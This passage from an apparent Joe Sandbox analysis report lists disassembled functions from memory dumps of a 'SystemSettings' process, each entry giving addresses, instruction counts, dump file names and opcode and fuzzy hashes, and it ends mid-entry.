                                                                  • Instruction Fuzzy Hash: 9F410633A1E1529EE756BB7CB4450E97B60EF413A4F0846B6D08C8F497DF1C284987A9
                                                                  Function 00007FF848F53BEF Relevance: .1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e5eeed57b1ae272a786e585c04ff08e0481fc2a930f4d42888bf1676a8c2baf
                                                                  • Instruction ID: 8abd047ddac52bdef56372713bc49f91af8bda298face928080d6702c9c69a34
                                                                  • Opcode Fuzzy Hash: 2e5eeed57b1ae272a786e585c04ff08e0481fc2a930f4d42888bf1676a8c2baf
                                                                  • Instruction Fuzzy Hash: 2041D131A1C95E5FE688FB6C84662B9B3D2EF95380F444079D40DC32C3DE2DA8828785
                                                                  Function 00007FF848F53BC6 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cf603c900b314c7b19c33c530e708244998e0e945ce0b30d4aa5fd9f25179a8
                                                                  • Instruction ID: 2d197e9e1827920356973f83df5b7837cecaf4fcbdd9aec2de3782f510bf0dff
                                                                  • Opcode Fuzzy Hash: 1cf603c900b314c7b19c33c530e708244998e0e945ce0b30d4aa5fd9f25179a8
                                                                  • Instruction Fuzzy Hash: 0441D132A1C95A5FEA88FB6C84662B9B3D1FF56780F840179D40DC72C7DE2CAC818745
                                                                  Function 00007FF848F208D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf814b190738c88db263250266acb9bfbc248414c5bc42e4ada9bbd3ef9605c8
                                                                  • Instruction ID: 63bd682baf409edfc567006e90c400a1c71a2ba955e6bc3a27be8f117a553bdc
                                                                  • Opcode Fuzzy Hash: bf814b190738c88db263250266acb9bfbc248414c5bc42e4ada9bbd3ef9605c8
                                                                  • Instruction Fuzzy Hash: 21413622A1E9655FE344B37C70992FA7B90EF853A8F0805BBD14DCB1D7DE1C6841829C
                                                                  Function 00007FF848F21171 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fd775e239e007a0a8be59e4ec7675f331974f0ecf861b3497084ce7e0594a55
                                                                  • Instruction ID: f38abac1c82fb00dcd3c19c178530c76d82a8def652b1619ba9d146d8b5049e0
                                                                  • Opcode Fuzzy Hash: 2fd775e239e007a0a8be59e4ec7675f331974f0ecf861b3497084ce7e0594a55
                                                                  • Instruction Fuzzy Hash: 5C31813190D68A8FDB46EB64C8599B97BF1FF5A300F0805FAC00AD71E3DB29A845C755
                                                                  Function 00007FF848F20998 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a07ddc5fbccf4e9c047dbc3ca3dd05fdb8e91fdf8ac4bf3dd8cdbb7920b6357
                                                                  • Instruction ID: 6c4a509d1921805961f54595a59cb8466f660b56032040078dfda5a4e8c64405
                                                                  • Opcode Fuzzy Hash: 3a07ddc5fbccf4e9c047dbc3ca3dd05fdb8e91fdf8ac4bf3dd8cdbb7920b6357
                                                                  • Instruction Fuzzy Hash: C9212431B1D9691FE788F72C64596B936C2EF99351F1400B9E90EC33D7DE19AC818289
                                                                  Function 00007FF848F523E1 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 907be780e87d6a57a90de24a51078ed2c28c5651fb2ab3579df5b7992441ae56
                                                                  • Instruction ID: e00053ac8efe5cddf65766227d99353df484e7598874f9def6e77734a908faf8
                                                                  • Opcode Fuzzy Hash: 907be780e87d6a57a90de24a51078ed2c28c5651fb2ab3579df5b7992441ae56
                                                                  • Instruction Fuzzy Hash: 1E21D731A4DA964FE786F7AC84952B5A691FF69341F4401BAC40CC31C3DE2C58D68355
                                                                  Function 00007FF848F20C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aaa8bd1cfe2e0bdff666cbc3427c7e9420ab5d84605c2d5524bdc31526d12188
                                                                  • Instruction ID: 6174cb0884876c5019886cc60f6b74a0c9246afcb37d0f91436a45ad226d670e
                                                                  • Opcode Fuzzy Hash: aaa8bd1cfe2e0bdff666cbc3427c7e9420ab5d84605c2d5524bdc31526d12188
                                                                  • Instruction Fuzzy Hash: 3B210476E0D2999FE312BB68A8411EC7BA0EF823A5F1441B3D548CB1C3DA3D25468799
                                                                  Function 00007FF848F52AAC Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bab2e664b72b8051a2917df28d97c7c24ba6a1b2f5e61ad47fe4b172dce9a40b
                                                                  • Instruction ID: 4e477f9e2d1c825e58b4ade42818b59799e86342bee0448f86910ce3296d0249
                                                                  • Opcode Fuzzy Hash: bab2e664b72b8051a2917df28d97c7c24ba6a1b2f5e61ad47fe4b172dce9a40b
                                                                  • Instruction Fuzzy Hash: 2A114F35E0C92A8FE7A9EB5CD4587B973A1FBA8750F040679C40DD72C6DB38AC428784
                                                                  Function 00007FF848F56F18 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07b1e4ff95a63e41f2be962427bf9c9ab0ffec6cf2aa5867779694e0ce53c8b7
                                                                  • Instruction ID: 55e20dd731b7211942bdf2d4e382634a6f2706e9c68859b76b9983258888a094
                                                                  • Opcode Fuzzy Hash: 07b1e4ff95a63e41f2be962427bf9c9ab0ffec6cf2aa5867779694e0ce53c8b7
                                                                  • Instruction Fuzzy Hash: FD01FC17A1F55259D604B23D78564FA7BA0DF412BEF0882B7E14CCD083EE1C548982AC
                                                                  Function 00007FF848F21996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc3a56c463aa1b1142a5161d427cc5f592da7a35307b31dee07e4bbe11be3a8f
                                                                  • Instruction ID: 069bef2734b47cce6d650f7387ab7ca2e30f0ae852dbc31d947060b27687c5dd
                                                                  • Opcode Fuzzy Hash: dc3a56c463aa1b1142a5161d427cc5f592da7a35307b31dee07e4bbe11be3a8f
                                                                  • Instruction Fuzzy Hash: 87110331E1C80A8FEB94FB68D4556B93392EF94351F1441B5D44DC72D2EE2AB8818B48
                                                                  Function 00007FF848F20C38 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a70a384cb6d5224e48082ca82fc2923822fe0f3233b5245c0181f9f4af129153
                                                                  • Instruction ID: 45153be57b04c98af041cf900276265065780c8b59384f09fc363d7e7fa7b854
                                                                  • Opcode Fuzzy Hash: a70a384cb6d5224e48082ca82fc2923822fe0f3233b5245c0181f9f4af129153
                                                                  • Instruction Fuzzy Hash: C311C272E0D68D8FE712FB78A8501AC7FB0EF82390F0545B6D844DB2D2D63955498785
                                                                  Function 00007FF848F20C40 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87aa9532120af20b26dd97724f1c6bcaaa9a8ac719887618c064fd247f7bcd50
                                                                  • Instruction ID: f729b6e9a0db2d7f352d7085a884e42109ae6a13a06f6a1ea2a6e68bfcf48806
                                                                  • Opcode Fuzzy Hash: 87aa9532120af20b26dd97724f1c6bcaaa9a8ac719887618c064fd247f7bcd50
                                                                  • Instruction Fuzzy Hash: 7911AD72E0D6898FE712FB78A8501AC7FB0EF82390F0541F6D844DB2D2DA3969498784
                                                                  Function 00007FF848F2190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7db9a79372cfee6515133ce0fb61bdddb4bfeba74a023a4a42181dbe5dc6632f
                                                                  • Instruction ID: 87a2318ac493abfbf3839bbd1c95ab1c6630de27da5e5bcd02ce87238cdb7576
                                                                  • Opcode Fuzzy Hash: 7db9a79372cfee6515133ce0fb61bdddb4bfeba74a023a4a42181dbe5dc6632f
                                                                  • Instruction Fuzzy Hash: 34015B31E0C81A8EE7A4FB5CA8152B97292BF94390F1502B5C41DD32D2EF397D858A49
                                                                  Function 00007FF848F5D83B Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46cce34b173a5c49353100838be42808dfbf4e764cbbb6c4427d88c3af84f5ec
                                                                  • Instruction ID: a2a7e557f5264a9a71aad38216255bcffb3f8a31808406372206ed332ffc9448
                                                                  • Opcode Fuzzy Hash: 46cce34b173a5c49353100838be42808dfbf4e764cbbb6c4427d88c3af84f5ec
                                                                  • Instruction Fuzzy Hash: 9C017131F099168FEB58E75998457BDB7A2EFE4392F148035C008D72C6CF3969868794
                                                                  Function 00007FF848F25A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a81cb71dd9a0af541d719b4d1b71b4cd86ec96344c288898ea15a05c2f7f53d9
                                                                  • Instruction ID: 2c4780ff7043ded237b40a87f8ad6584a278df425719b28742856e24c4789088
                                                                  • Opcode Fuzzy Hash: a81cb71dd9a0af541d719b4d1b71b4cd86ec96344c288898ea15a05c2f7f53d9
                                                                  • Instruction Fuzzy Hash: 65014435908A5ACFCB55EF08C894BA977F1FBA8314F1502AAD40ED76A1DB34EA40CF41
                                                                  Function 00007FF848F20C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c482a22f39f750369f2ceef4309357359fd69eb4bd08dd9ffbcc036be2a01c15
                                                                  • Instruction ID: ba37ae00f4c7399834df4cf045b4a0461bdf336819a14e9de973e8979cf86a98
                                                                  • Opcode Fuzzy Hash: c482a22f39f750369f2ceef4309357359fd69eb4bd08dd9ffbcc036be2a01c15
                                                                  • Instruction Fuzzy Hash: FE015672D0D2899FE712FB6498500A97FB0EF86350F1441F6D848DB2D2EA396A488785
                                                                  Function 00007FF848F5AAA9 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68cdc0e9119cf9ca44a3d6733ce525b7619e6d34022e92ccca4f9db35761259c
                                                                  • Instruction ID: 335390f5289682feb6ad9267fbfd6c585d58726f417086d0e6a824f6032bff10
                                                                  • Opcode Fuzzy Hash: 68cdc0e9119cf9ca44a3d6733ce525b7619e6d34022e92ccca4f9db35761259c
                                                                  • Instruction Fuzzy Hash: 5BF0A021B1DBC84FC72A96395865061BFE1DB9B50274A02EFC096CB2E3ED58EC86C741
                                                                  Function 00007FF848F20BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 224c4c86d326f72534919735e09873a87b8bfc55a74e2249cbe7020055353e56
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: 09F0E531E5D54A4FEA407378E8D24A87F60EF4B310FD504F2D489CA0D3EA4A589A8716
                                                                  Function 00007FF848F20B77 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                                  • Instruction ID: 2c7b4b8e3a9c2384f151e18947adbb935f9dda1334c699a7f1670f3ae16a3a4c
                                                                  • Opcode Fuzzy Hash: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                                  • Instruction Fuzzy Hash: 11F0553560DA85CFD780AB38ECA04D4BBA0FB02209B6616EAC0C9C7093D2921809C700
                                                                  Function 00007FF848F219C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 643342e4e37fe4561cbe4e4764d6ed320aecef4574f992b8f5b8ca0e69ba4efd
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: A6F03C31E0C81A8EEB64FB58D8556F873A1EB94392F1401F6C04E972E1DE3979C68A48
                                                                  Function 00007FF848F34AF1 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction ID: 50ef7baea39d342261ce06b4d71bd1dbb3b55759c2fe5085fce3c7f609299e48
                                                                  • Opcode Fuzzy Hash: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction Fuzzy Hash: 10F05E31E0D6174FE619BB4CA4406B93390EF35390F604276D44ED32DBDF28A8028699
                                                                  Function 00007FF848F579ED Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction ID: 87f92062118255fcb44668661dbdbdf62213d6b70ba1ef0c23315913c0476a83
                                                                  • Opcode Fuzzy Hash: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction Fuzzy Hash: E1F0F220A4E7C20FC30B573848644607FB09E2725179A04EBD086CF5F3E9199C9AC322
                                                                  Function 00007FF848F393CA Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8dea24db20833663e1a88c57e595b44994c008cd575179a669753b2a5789a2ba
                                                                  • Instruction ID: 9ee42b32a086ad1857d290e1d27b8bde7be4332e970408e112397c6553cbff64
                                                                  • Opcode Fuzzy Hash: 8dea24db20833663e1a88c57e595b44994c008cd575179a669753b2a5789a2ba
                                                                  • Instruction Fuzzy Hash: 2FF03935E1C81A4FEA95FB2898653B962A2FF99350F5401B5D80DD32C6CE28BC828B55
                                                                  Function 00007FF848F261A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 26f9196406735b8252ef0e5b33a1d5fc69642307707be3e3b7f04e1aa36bc3c3
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: 19F03935D0C11A4FF7A4A394E4513AA73A0EB84350F1400B9D90EA37C2DE3CAE818B1D
                                                                  Function 00007FF848F579B9 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afe58893e434721fec05e7b60ee18612c041b28cbf4db1a1d9207a3ffaad93e7
                                                                  • Instruction ID: 2d82e6ab5ae050a02a849ba86f7ba7ab76a3dd9b92f1608a7a2ce01a11a35e26
                                                                  • Opcode Fuzzy Hash: afe58893e434721fec05e7b60ee18612c041b28cbf4db1a1d9207a3ffaad93e7
                                                                  • Instruction Fuzzy Hash: AAE0BF21A497844FC70A663488658543BB1DF6725174A41D7D045CF6B3D61DDC4DC751
                                                                  Function 00007FF848F38868 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction ID: c3d5f0c3198227523331ad8b3b44ad54c92322ec2f537f06ba6572fb567ad846
                                                                  • Opcode Fuzzy Hash: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction Fuzzy Hash: 2AE09A32D4C1068FF700BB90C404AE872049F513A4F0942B68C4DAB2D3DF6DA9448BC9
                                                                  Function 00007FF848F33CE0 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                  • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                  • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                  • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                  Function 00007FF848F5A610 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F5DA99 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abf1fe238e975699977a4e2cad7575a76beb606b1b00fcc38e74fb71d2e235d9
                                                                  • Instruction ID: 161374e98680603957dd366a0cbc6b48fb407d9404acf937829b029061d06991
                                                                  • Opcode Fuzzy Hash: abf1fe238e975699977a4e2cad7575a76beb606b1b00fcc38e74fb71d2e235d9
                                                                  • Instruction Fuzzy Hash: 90E01A7294E7C44FC70BAB3488A99557F70EE2721074A41EEC046CF1A3E62A9C49CB01
                                                                  Function 00007FF848F5A580 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F5DA19 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
